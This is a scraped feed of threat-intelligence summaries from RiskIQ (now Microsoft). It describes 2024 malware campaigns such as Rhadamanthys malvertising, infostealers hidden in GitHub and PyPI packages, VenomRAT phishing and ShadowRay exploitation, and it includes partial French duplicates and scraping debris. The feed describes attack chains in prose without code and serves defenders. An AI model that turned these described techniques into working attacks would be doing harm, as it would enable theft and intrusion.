- cyber risk firms (now microsoft) ## Snapshot Checkmarx reports a recent attack campaign where cybercriminals manipulated GitHub\'s search functionality and used repositories to distribute malware. ## Description The attackers created repositories with popular names and topics, using techniques like automated updates and using fake accounts to add fake stargazers to projects to boost search rankings and deceive users. Malicious code was hidden within Visual Studio project files to evade detection, automatically executing when the project is built. The attackers also padded the executable with many zeros, a technique used to artificially boost the file size.  Checkmarx reports the padded executable file shares similarities with the "Keyzetsu clipper" malware, targeting cryptocurrency wallets. The malware establishes persistence on infected Windows machines by creating a scheduled task that runs the malicious executable daily at 4AM without user confirmation. ## Recommendations Checkmarx reccomends to prevent falling victim to similar attacks to keep an eye on the following suspicious properties of a repo: 1. Commit frequency: Does the repo have an extraordinary number of commits relative to its age? Are these commits changing the same file with very minor changes? 2. Stargazers: Who is starring this repo? Do most of the stargazers appear to have had accounts created around the same time? By being aware of these red flags, users can better protect themselves from inadvertently downloading and executing malware. ## References [https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/#new_tab](https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attac]]> 2024-04-12T19:25:21+00:00 https://community.riskiq.com/article/4d0ffb2c www.secnews.physaphae.fr/article.php?IdArticle=8480952 False Malware None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Germany ## Snapshot Proofpoint has identified TA547 launching an email campaign targeting German organizations with Rhadamanthys malware, marking the first known use of Rhadamanthys by this threat actor. The campaign involved impersonating a German retail company in emails containing password-protected ZIP files purportedly related to invoices, targeting multiple industries in Germany. ## Description The ZIP files contained LNK files which, when executed, triggered a PowerShell script to run a remote script loading Rhadamanthys into memory, bypassing disk writing. The PowerShell script displayed characteristics suggestive of machine-generated content, potentially from large language models (LLMs).  The recent campaign in Germany represents a shift in techniques for TA547, including the use of compressed LNKs and the previously unobserved Rhadamanthys stealer. The incorporation of suspected LLM-generated content into the attack chain provides insight into how threat actors are leveraging LLM-generated content in malware campaigns, although it did not change the functionality or efficacy of the malware or the way security tools defended against it. ## Recommendations [Check out Microsoft\'s write-up on information stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6) [Check out additional OSINT on Rhadamanthys here.](https://sip.security.microsoft.com/intel-explorer/articles/0131b256) ## References [https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer](https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer)]]> 2024-04-12T18:11:30+00:00 https://community.riskiq.com/article/119bde85 www.secnews.physaphae.fr/article.php?IdArticle=8480922 False Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot The Insikt Group has uncovered a large-scale Russian-language cybercrime operation that leverages fake Web3 gaming projects to distribute infostealer malware targeting both macOS and Windows users. ## Description These Web3 games, based on blockchain technology, entice users with the potential for cryptocurrency earnings. The campaign involves creating imitation Web3 gaming projects with minor modifications to appear legitimate, along with fake social media accounts to enhance their credibility. Upon visiting the main webpages of these projects, users are prompted to download malware such as Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro, depending on their operating system. The threat actors have established a resilient infrastructure and are targeting Web3 gamers, exploiting their potential lack of cyber hygiene in pursuit of financial gains. The malware variants, including AMOS, are capable of infecting both Intel and Apple M1 Macs, indicating a broad vulnerability among users. The primary objective of the campaign appears to be the theft of cryptocurrency wallets, posing a significant risk to financial security. The threat actors\' Russian origin is hinted at by artifacts within the HTML code, although their exact location remains uncertain. ## References [https://www.recordedfuture.com/cybercriminal-campaign-spreads-infostealers-highlighting-risks-to-web3-gaming](https://www.recordedfuture.com/cybercriminal-campaign-spreads-infostealers-highlighting-risks-to-web3-gaming)]]> 2024-04-11T19:26:57+00:00 https://community.riskiq.com/article/0cdc08b5 www.secnews.physaphae.fr/article.php?IdArticle=8480234 False Malware,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Southern Europe - Northern Europe - Western Europe - Eastern Europe ## Snapshot Bitdefender discusses the increasing use of artificial intelligence (AI) by cybercriminals to conduct malvertising campaigns on social media platforms. ## Description Threat actors have been impersonating popular AI software such as Midjourney, Sora AI, DALL-E 3, Evoto, and ChatGPT 5 on Facebook to trick users into downloading purported official desktop versions of these AI software. The malicious webpages then download intrusive stealers such as Rilide, Vidar, IceRAT, and Nova Stealer, which harvest sensitive information including credentials, autocomplete data, credit card information, and crypto wallet information. These malvertising campaigns have targeted European users and have a significant reach through Meta\'s sponsored ad system. The campaigns are organized by taking over existing Facebook accounts, changing the page\'s content to appear legitimate, and boosting the page\'s popularity with engaging content and AI-generated images. ## References [https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/#new_tab](https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/#new_tab)]]> 2024-04-10T20:29:45+00:00 https://community.riskiq.com/article/1e1b0868 www.secnews.physaphae.fr/article.php?IdArticle=8479574 False None ChatGPT 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot The AhnLab Security Intelligence Center (ASEC) has identified a concerning trend where threat actors are exploiting YouTube channels to distribute Infostealers, specifically Vidar and LummaC2. ## Description Rather than creating new channels, the attackers are hijacking existing, popular channels with hundreds of thousands of subscribers. The malware is disguised as cracked versions of legitimate software, and the attackers use YouTube\'s video descriptions and comments to distribute the malicious links. The Vidar malware, for example, is disguised as an installer for Adobe software, and it communicates with its command and control (C&C) server via Telegram and Steam Community. Similarly, LummaC2 is distributed under the guise of cracked commercial software and is designed to steal account credentials and cryptocurrency wallet files.  The threat actors\' method of infiltrating well-known YouTube channels with a large subscriber base raises concerns about the potential reach and impact of the distributed malware. The disguised malware is often compressed with password protection to evade detection by security solutions. It is crucial for users to exercise caution when downloading software from unofficial sources and to ensure that their security software is up to date to prevent malware infections. ## References [https://asec.ahnlab.com/en/63980/](https://asec.ahnlab.com/en/63980/)]]> 2024-04-09T19:48:57+00:00 https://community.riskiq.com/article/e9f5e219 www.secnews.physaphae.fr/article.php?IdArticle=8478894 False Malware,Hack,Threat,Prediction,Commercial None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot The article from FortiGuard Labs Threat Research uncovers a recent threat actor\'s distribution of VenomRAT and other plugins through a phishing email containing malicious Scalable Vector Graphics (SVG) files. ## Description The email entices victims to click on an attachment, which downloads a ZIP file containing a Batch file obfuscated with the BatCloak tool. Subsequently, ScrubCrypt is used to load the final payload, VenomRAT, while maintaining a connection with a command and control (C2) server to install plugins on victims\' environments. The plugin files downloaded from the C2 server include VenomRAT version 6, Remcos, XWorm, NanoCore, and a stealer designed for specific crypto wallets. ## References [https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins](https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins)]]> 2024-04-08T20:36:41+00:00 https://community.riskiq.com/article/98d69c76 www.secnews.physaphae.fr/article.php?IdArticle=8478320 False Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-08T15:09:15+00:00 https://community.riskiq.com/article/974639f2 www.secnews.physaphae.fr/article.php?IdArticle=8478203 False Ransomware,Spam,Malware,Tool,Threat,Cloud APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Mexico - South America - Central America and the Caribbean - North America ## Snapshot Trustwave SpiderLabs has discovered a phishing campaign targeting the Latin American region. ## Description The phishing email contains a ZIP file attachment that, when extracted, reveals an HTML file that leads to a malicious file download posing as an invoice. The attached HTML file contains a concatenated URL that leads to a suspended page when accessed in a different region. However, if the URL is accessed using a Mexico-based IP, it will redirect to a captcha page for human verification, which leads to another URL that will download a malicious RAR file. The RAR file contains a PowerShell script that will check the victim\'s machine for information like computer name, operating system, etc. It will also check for the presence of an antivirus product. Several base64 encoded strings in the script were observed, one of which, when decoded, contains another URL request that uses the \'Post\' method for the URL response. The decoded URL will check for the user\'s country. Another notable base64 encoded string contains a malicious URL that will download a malicious ZIP file. ## References [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/)]]> 2024-04-05T18:15:05+00:00 https://community.riskiq.com/article/abfabfa1 www.secnews.physaphae.fr/article.php?IdArticle=8476654 False None None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-05T13:39:39+00:00 https://community.riskiq.com/article/b4f39b04 www.secnews.physaphae.fr/article.php?IdArticle=8476526 False Malware,Tool,Vulnerability,Threat,Studies,Industrial,Prediction,Technical Guam 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Trend Micro analyzed a cyberespionage attack the company has attributed to Earth Freybug, a subset of APT41 (tracked by Microsoft as [Brass Typhoon](https://sip.security.microsoft.com/intel-profiles/f0aaa62bfbaf3739bb92106688e6a00fc05eafc0d4158b0e389b4078112d37c6?)). According to Trend Micro, Earth Freybug has been active since at least 2012 and the Chinese-linked group has been active in espionage and financially motivated attacks. Earth Freybug employs diverse tools like LOLBins and custom malware, targeting organizations globally. The attack used techniques like dynamic link library (DLL) hijacking and API unhooking to avoid monitoring for a new malware called UNAPIMON. UNAPIMON evades detection by preventing child processes from being monitored. The attack flow involved creating remote scheduled tasks and executing reconnaissance commands to gather system information. Subsequently, a backdoor was launched using DLL side-loading via a service called SessionEnv, which loads a malicious DLL. UNAPIMON, the injected DLL, uses API hooking to evade monitoring and execute malicious commands undetected, showcasing the attackers\' sophistication. [Check out Microsoft\'s write-up on dynamic-link library (DLL) hijacking here.](https://sip.security.microsoft.com/intel-explorer/articles/91be20e8?) #### Reference URL(s) 1. https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html #### Publication Date April 2, 2024 #### Author(s) Christopher So]]> 2024-04-03T20:46:53+00:00 https://community.riskiq.com/article/327771c8 www.secnews.physaphae.fr/article.php?IdArticle=8475473 False Malware,Tool,Prediction APT 41 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Check Point Research has analyzed the latest Linux version (v11) of DinodasRAT, which is a cross-platform backdoor that was observed in attacks by the Chinese threat actor LuoYu. The malware is more mature than the Windows version, with a set of capabilities tailored specifically for Linux servers. The latest version introduces a separate evasion module to hide any traces of malware in the system by proxying and modifying the system binaries\' execution. The malware is installed on Linux servers as a way for the threat actors to gain an additional foothold in the network. DinodasRAT was initially based on the open-source project called SimpleRemoter, a remote access tool based on the Gh0st RAT, but with several additional upgrades. #### Reference URL(s) 1. https://research.checkpoint.com/2024/29676/ #### Publication Date March 31, 2024 #### Author(s) Check Point Research ]]> 2024-04-02T20:33:27+00:00 https://community.riskiq.com/article/57ab8662 www.secnews.physaphae.fr/article.php?IdArticle=8474837 False Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) [Consultez la rédaction de Microsoft \\ sur les voleurs d'informations ici.] (Https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6?)?) > [Découvrez les rapports OSINT précédents sur Rhadamanthys ici.] (Https://sip.security.microsoft.com/intel-explorer/articles/463afcea) #### URL de référence (s) 1. https://asec.ahnlab.com/en/63477/ #### Date de publication 31 mars 2024 #### Auteurs) Ahnlab Security Intelligence Center

---

#### Description AhnLab Security Intelligence Center (ASEC) discovered Rhadamanthys, an information stealer malware, using Google Ads tracking to distribute itself, posing as installers for popular groupware like Notion and Slack. The malware downloads malicious files after installation, often distributed through Inno Setup or NSIS installers. The attackers utilized Google Ads tracking to lead users to a malicious site, taking advantage of the platform\'s ability to insert external analytic website addresses. Clicking on the ads redirected users to a site tricking them into downloading the malware, ultimately injecting the Rhadamanthys malware into legitimate Windows files for data theft. >[Check out Microsoft\'s write-up on Information Stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6?) >[Check out previous OSINT reporting on Rhadamanthys here.](https://sip.security.microsoft.com/intel-explorer/articles/463afcea) #### Reference URL(s) 1. https://asec.ahnlab.com/en/63477/ #### Publication Date March 31, 2024 #### Author(s) AhnLab Security Intelligence Center ]]> 2024-04-01T22:00:49+00:00 https://community.riskiq.com/article/bf8b5bc1 www.secnews.physaphae.fr/article.php?IdArticle=8474308 False Malware None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description ESET research shares insights into AceCryptor, one of the most popular and prevalent cryptors-as-a-service (CaaS) in the second half of 2023, with a focus on Rescoms campaigns in European countries. Even though well known by security products, AceCryptor\'s prevalence is not showing indications of decline: on the contrary, the number of attacks significantly increased due to the Rescoms campaigns. The threat actor behind those campaigns in some cases abused compromised accounts to send spam emails in order to make them look as credible as possible. The goal of the spam campaigns was to obtain credentials stored in browsers or email clients, which in case of a successful compromise would open possibilities for further attacks. #### Reference URL(s) 1. https://www.welivesecurity.com/en/eset-research/rescoms-rides-waves-acecryptor-spam/ #### Publication Date March 20, 2024 #### Author(s) Jakub Kaloč ]]> 2024-04-01T20:02:08+00:00 https://community.riskiq.com/article/e3595388 www.secnews.physaphae.fr/article.php?IdArticle=8474239 False Spam,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-01T13:51:22+00:00 https://community.riskiq.com/article/0bb98406 www.secnews.physaphae.fr/article.php?IdArticle=8474062 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Mobile,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description A new malvertising campaign has been discovered that uses a Go language loader to deploy the Rhadamanthys stealer. The threat actor purchased an ad that appears at the top of Google search results, claiming to be the PuTTY homepage. The ad URL points to an attacker-controlled domain where they can show a legitimate page to visitors that are not real victims. Real victims coming from the US will be redirected to a fake site that looks and feels exactly like putty.org. The malicious payload is downloaded via a two-step redirection chain, and the server is believed to perform some checks for proxies while also logging the victim\'s IP address. Upon executing the dropper, there is an IP check for the victim\'s public IP address. If a match is found, the dropper proceeds to retrieve a follow-up payload from another server. The payload is Rhadamanthys, which is executed by the parent process PuTTy.exe. The loader is closely tied to the malvertising infrastructure, and it is quite likely that the same threat actor is controlling both. #### Reference URL(s) 1. https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys #### Publication Date March 22, 2024 #### Author(s) Jérôme Segura ]]> 2024-03-29T19:00:47+00:00 https://community.riskiq.com/article/e6d270fc www.secnews.physaphae.fr/article.php?IdArticle=8472745 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Analysts from Oligo, an Israeli security research company, have identified an ongoing active attack campaign targeting a critical vulnerability in the Ray open-source AI framework, impacting thousands of companies and servers globally. This vulnerability, known as ShadowRay (CVE-2023-48022), allows attackers to take control of computing resources and leak sensitive data. According to Ray\'s developer, Anyscale, this issue is not a vulnerability. Rather, it is an essential feature of Ray\'s design that enables the execution of dynamic code within a cluster. Therefore, Anyscale has not released a patch and CVE-2023-48022 does not appear in several vulnerability databases. Since September 2023, malicious actors have accessed thousands of Ray servers across multiple industries, including education, finance, and biopharma. Exploiting this access, actors have stolen sensitive data, credentials, cloud tokens, and used computing resources for cryptocurrency mining operations. [Check out Microsoft\'s write-up on CVE-2023-48022 here.](https://sip.security.microsoft.com/intel-explorer/cves/CVE-2023-48022/description?) #### Reference URL(s) 1. https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild #### Publication Date March 26, 2024 #### Author(s) Avi Lumelsky, Guy Kaplan, and Gal Elbaz]]> 2024-03-28T20:08:52+00:00 https://community.riskiq.com/article/e4cd5bc2 www.secnews.physaphae.fr/article.php?IdArticle=8472239 False Vulnerability,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description The authors behind Android banking malware Vultur have been spotted adding new technical features, which allow the malware operator to further remotely interact with the victim\'s mobile device. Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions. #### Reference URL(s) 1. https://research.nccgroup.com/2024/03/28/android-malware-vultur-expands-its-wingspan/ #### Publication Date March 28, 2024 #### Author(s) Joshua Kamp ]]> 2024-03-28T19:11:03+00:00 https://community.riskiq.com/article/3f7c3599 www.secnews.physaphae.fr/article.php?IdArticle=8472213 False Malware,Mobile,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) [Consultez la rédaction de Microsoft \\ sur les informationsStealiers ici.] (Https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6) #### URL de référence (s) 1. https://www.trustwave.com/en-us/Ressources / blogs / spiderLabs-blog / agent-teslas-new-ride-the-ramen-of-a-novel-chargedeur / #### Date de publication 26 mars 2024 #### Auteurs) Bernard Bautista

---

#### Description SpiderLabs identified a phishing email on March 8, 2024, with an attached archive that included a Windows executable disguised as a fraudulent bank payment. This action initiated an infection chain culminating in the deployment of Agent Tesla. The loader is compiled with .NET and uses obfuscation and packing techniques to evade detection. It also exhibits polymorphic behavior with distinct decryption routines, making it difficult for traditional antivirus systems to detect. The loader uses methods like patching to bypass Antimalware Scan Interface (AMSI) detection and dynamically load payloads, ensuring stealthy execution and minimizing traces on disk. > [Check out Microsoft\'s write-up on Information Stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6) #### Reference URL(s) 1. https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/agent-teslas-new-ride-the-rise-of-a-novel-loader/ #### Publication Date March 26, 2024 #### Author(s) Bernard Bautista ]]> 2024-03-27T19:14:21+00:00 https://community.riskiq.com/article/5ffaa8a4 www.secnews.physaphae.fr/article.php?IdArticle=8471583 False Patching None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description A new malware campaign called Sign1 has been discovered by Sucuri and GoDaddy Infosec. The malware has been found on over 2,500 sites in the past two months. The malware is injected into WordPress custom HTML widgets that the attackers add to compromised websites. The malware is injected using a legitimate Simple Custom CSS and JS plugin. The malware is designed to redirect visitors to scam sites. The malware is time-based and uses dynamic JavaScript code to generate URLs that change every 10 minutes. The malware is specifically looking to see if the visitor has come from any major websites such as Google, Facebook, Yahoo, Instagram etc. If the referrer does not match to these major sites, then the malware will not execute. #### Reference URL(s) 1. https://blog.sucuri.net/2024/03/sign1-malware-analysis-campaign-history-indicators-of-compromise.html #### Publication Date March 20, 2024 #### Author(s) Ben Martin ]]> 2024-03-26T19:39:28+00:00 https://community.riskiq.com/article/063f7fac www.secnews.physaphae.fr/article.php?IdArticle=8470965 False Malware Yahoo 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description StrelaStealer is a malware that targets email clients to steal login data, sending it to the attacker\'s server for potential further attacks. Since StrelaStealer\'s emergence in 2022, the threat actor has launched multiple large-scale email campaigns, with its most recent campaigns impacting over 100 organizations across the EU and U.S. Attackers have targeted organizations in a variety of industries, but organizations in the high tech industry have been the biggest target. Technical analysis of StrelaStealer reveals an evolving infection chain using ZIP attachments, JScript files, and updated DLL payloads, demonstrating the malware\'s adaptability and the challenge it poses to security analysts and products. #### Reference URL(s) 1. https://unit42.paloaltonetworks.com/strelastealer-campaign/ #### Publication Date March 22, 2024 #### Author(s) Benjamin Chang, Goutam Tripathy, Pranay Kumar Chhaparwal, Anmol Maurya, and Vishwa Thothathri]]> 2024-03-26T17:11:47+00:00 https://community.riskiq.com/article/82785858 www.secnews.physaphae.fr/article.php?IdArticle=8470906 False Malware,Threat,Technical None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-03-25T13:28:48+00:00 https://community.riskiq.com/article/95f9e604 www.secnews.physaphae.fr/article.php?IdArticle=8470186 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) [Consultez la rédaction de Microsoft \\ sur Secret Blizzard ici.] (Https://sip.security.microsoft.com/intel-Profils / 01d15f655c45c517f52235d63932fb377c319176239426681412afb01bf39dcc?) #### URL de référence (s) 1. https://blog.talosintelligence.com/tinyturla-full-kill-chain/ #### Date de publication 21 mars 2024 #### Auteurs) Asheer Malhotra Holger Unterbrink Vitor Ventura Arnaud Zobec

---

#### Description Cisco Talos and CERT.NGO have provided updates on an ongoing campaign by the Russian espionage group, Turla (tracked by Microsoft as Secret Blizzard), revealing the entire kill chain used by the group, including tactics like stealing information and spreading through infected networks. The attackers targeted a European NGO, infecting multiple systems, establishing persistence, and evading anti-virus products before deploying their TinyTurla-NG implant for data exfiltration and network pivoting. Turla\'s post-compromise activities involve configuring anti-virus exclusions, setting up persistence through batch files, and deploying TinyTurla-NG and a custom Chisel beacon for reconnaissance and exfiltration. Despite initial compromise dates in October 2023, the majority of data exfiltration occurred in January 2024, highlighting the persistence and stealth of Turla\'s operations. > [Check out Microsoft\'s write-up on Secret Blizzard here.](https://sip.security.microsoft.com/intel-profiles/01d15f655c45c517f52235d63932fb377c319176239426681412afb01bf39dcc?) #### Reference URL(s) 1. https://blog.talosintelligence.com/tinyturla-full-kill-chain/ #### Publication Date March 21, 2024 #### Author(s) Asheer Malhotra Holger Unterbrink Vitor Ventura Arnaud Zobec ]]> 2024-03-22T21:01:12+00:00 https://community.riskiq.com/article/bf6723e9 www.secnews.physaphae.fr/article.php?IdArticle=8468727 False None None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) [Consultez la rédaction de Microsoft \\ sur CVE-2023-46604 - Apache ActiveMQ ici.] (Https://sip.security.microsoft.com/intel-profiles/cve-2023-46604) #### URL de référence (s) 1. https://www.cybereason.com/blog/beware-of-the-messengers-expoiting-activemq-vulnerabilité #### Date de publication 13 mars 2024 #### Auteurs) Équipe de services de sécurité de la cyberéasie

---

#### Description Cybereason Security Services has issued a Threat Analysis Report on an incident involving a Linux server that saw malicious shell executions from a Java process running Apache ActiveMQ. The ActiveMQ service is an open-source message broker used to bridge communications from separate servers running different components and/or written in different languages. The activity is strongly assessed to have leveraged a Remote Code Execution (RCE) vulnerability CVE-2023-46604. The observed shell executions include attempts to download additional payloads such as executables of Mirai Botnet, HelloKitty Ransomware, SparkRAT executables, and coinminers including XMRig. The deployment methodologies mainly employ automation; however, one initial foothold is dependent on an interactive session via Netcat reverse shells. > [Check out Microsoft\'s write-up on CVE-2023-46604 - Apache ActiveMQ here.](https://sip.security.microsoft.com/intel-profiles/CVE-2023-46604) #### Reference URL(s) 1. https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability #### Publication Date March 13, 2024 #### Author(s) Cybereason Security Services Team ]]> 2024-03-21T20:17:15+00:00 https://community.riskiq.com/article/9b8f807f www.secnews.physaphae.fr/article.php?IdArticle=8468115 False Ransomware,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) [Consultez la rédaction de Microsoft \\ sur les voleurs d'informations ici.] (Https://sip.security.microsoft.com/intel-Profils / 2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6?) #### URL de référence (s) 1. https://www.rewterz.com/rewterz-news/rewterz-threat-lert-formbook-malware-active-iocs-98 #### Date de publication 21 mars 2024 #### Auteurs) Rewterz

---

#### Description FormBook, an information stealer (infostealer) malware discovered in 2016, has various capabilities such as tracking keystrokes, accessing files, capturing screenshots, and stealing passwords from web browsers. It can execute additional malware as directed by a command-and-control server and is adept at evading detection through techniques like code obfuscation and encryption. FormBook\'s flexibility allows customization for specific targets and its obfuscation methods make removal challenging. Cybercriminals distribute FormBook through email attachments like PDFs and Office Documents, with notable use during the 2022 Russia-Ukraine conflict. FormBook\'s successor, XLoader, is currently active. > [Check out Microsoft\'s write-up on information stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6?) #### Reference URL(s) 1. https://www.rewterz.com/rewterz-news/rewterz-threat-alert-formbook-malware-active-iocs-98 #### Publication Date March 21, 2024 #### Author(s) Rewterz]]> 2024-03-21T19:45:35+00:00 https://community.riskiq.com/article/7b321c6c www.secnews.physaphae.fr/article.php?IdArticle=8468091 False Malware None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Kaspersky researchers have discovered a new threat that targets Chinese users of one of the most popular search engines in China. The threat involves modified versions of popular text editors that were distributed in the system. In the first case, the malicious resource appeared in the advertisement section, while in the second case, it appeared at the top of the search results. The attackers used typosquatting and other techniques to make their resources look as similar as possible to the official websites of popular programs. #### Reference URL(s) 1. https://securelist.com/trojanized-text-editor-apps/112167/ #### Publication Date March 13, 2024 #### Author(s) Sergey Puzan ]]> 2024-03-20T20:05:33+00:00 https://community.riskiq.com/article/5a806c77 www.secnews.physaphae.fr/article.php?IdArticle=8467532 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Perception Point\'s security researchers uncovered the PhantomBlu campaign targeting US-based organizations, deploying the NetSupport RAT through sophisticated evasion techniques and social engineering tactics. The attackers used legitimate features of remote administration tools, such as NetSupport Manager, for malicious activities like surveillance, keylogging, file transfer, and system control. The campaign leveraged OLE template manipulation in Microsoft Office documents to hide and execute malicious code, evading traditional security systems. Through analysis of phishing emails and payloads, the researchers identified the attackers\' preference for using reputable email delivery platforms and their intricate PowerShell dropper techniques. The PhantomBlu operation represents an evolution in malware delivery strategies, blending advanced evasion methods with social engineering to compromise targeted organizations effectively. #### Reference URL(s) 1. https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/ #### Publication Date March 18, 2024 #### Author(s) Ariel Davidpur]]> 2024-03-19T21:16:06+00:00 https://community.riskiq.com/article/356f4d44 www.secnews.physaphae.fr/article.php?IdArticle=8466954 False Malware,Tool None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Malwarebytes has reported that the number of search-based malvertising incidents almost doubled in February 2024. One malware family that has been tracked is FakeBat, which uses MSIX installers packaged with heavily obfuscated PowerShell code. The malvertiser distributing the malware was abusing URL shortener services, but has now started to use legitimate websites that appear to have been compromised. The latest campaigns are targeting many different brands, including OneNote, Epic Games, Ginger, and the Braavos smart wallet application. Each downloaded file is an MSIX installer signed with a valid digital certificate, and once extracted, each installer contains more or less the same files with a particular PowerShell script. When the installer is run, this PowerShell script will execute and connect to the attacker\'s command and control server. The threat actor is able to serve a conditional redirect to their own malicious site, and victims of interest will be cataloged for further use. The full infection chain can be summarized in the web traffic image seen in the article. The malware distributors are able to bypass Google\'s security checks and redirect victims to deceiving websites. #### Reference URL(s) 1. https://www.malwarebytes.com/blog/threat-intelligence/2024/03/fakebat-delivered-via-several-active-malvertising-campaigns #### Publication Date March 12, 2024 #### Author(s) Jérôme Segura ]]> 2024-03-19T19:15:33+00:00 https://community.riskiq.com/article/7cc81ecb www.secnews.physaphae.fr/article.php?IdArticle=8466898 False Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description AhnLab Security intelligence Center (ASEC) recently discovered the distribution of an infostealer disguised as the Adobe Reader installer. The threat actor is distributing the file as PDF, prompting users to download and run the file. The fake PDF file is written in Portuguese, and the message tells the users to download the Adobe Reader and install it. By telling the users that Adobe Reader is required to open the file, it prompts the user to download the malware and install it. #### Reference URL(s) 1. https://asec.ahnlab.com/en/62853/ #### Publication Date March 11, 2024 #### Author(s) ASEC ]]> 2024-03-18T15:42:59+00:00 https://community.riskiq.com/article/b2bef56a www.secnews.physaphae.fr/article.php?IdArticle=8466155 True Malware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-03-18T13:23:03+00:00 https://community.riskiq.com/article/54f79303 www.secnews.physaphae.fr/article.php?IdArticle=8466085 False Ransomware,Spam,Malware,Tool,Threat,Prediction None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description ReversingLabs has discovered a new campaign called BIPClip, which uses seven different open-source packages with 19 different versions on the Python Package Index (PyPI) to steal mnemonic phrases used to recover lost or destroyed crypto wallets. The campaign targets developers working on projects related to generating and securing cryptocurrency wallets, particularly those looking to implement the Bitcoin Improvement Proposal 39 (BIP39). The threat actors behind this campaign combined a variety of known and well-documented methods to achieve their goals while avoiding detection. First, they made their packages less suspicious by putting their malicious functionality into dependent packages and not into the packages that were directly distributed to their targets. Second, the content of each of the discovered packages was carefully crafted to make it look less suspicious. Finally, the threat actors focused only on what they wanted to get, making no effort to leverage their access to achieve full control over a compromised system or move laterally within the compromised development organization. #### Reference URL(s) 1. https://www.reversinglabs.com/blog/bipclip-malicious-pypi-packages-target-crypto-wallet-recovery-passwords #### Publication Date March 12, 2024 #### Author(s) Karlo Zanki ]]> 2024-03-12T19:01:44+00:00 https://community.riskiq.com/article/21aa5484 www.secnews.physaphae.fr/article.php?IdArticle=8462816 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description A new MSIX malware disguised as the Notion installer is being distributed through a website that looks similar to the actual Notion homepage. This file is a Windows app installer, and it is signed with a valid certificate. Upon running the file, the user gets a pop-up, and upon clicking the Install button, Notion is installed on the PC and is infected with malware. #### Reference URL(s) 1. https://asec.ahnlab.com/en/62815/ #### Publication Date March 10, 2024 #### Author(s) Anh Ho Facundo Muñoz Marc-Etienne M.Léveillé ]]> 2024-03-11T20:06:53+00:00 https://community.riskiq.com/article/f21ac4ec 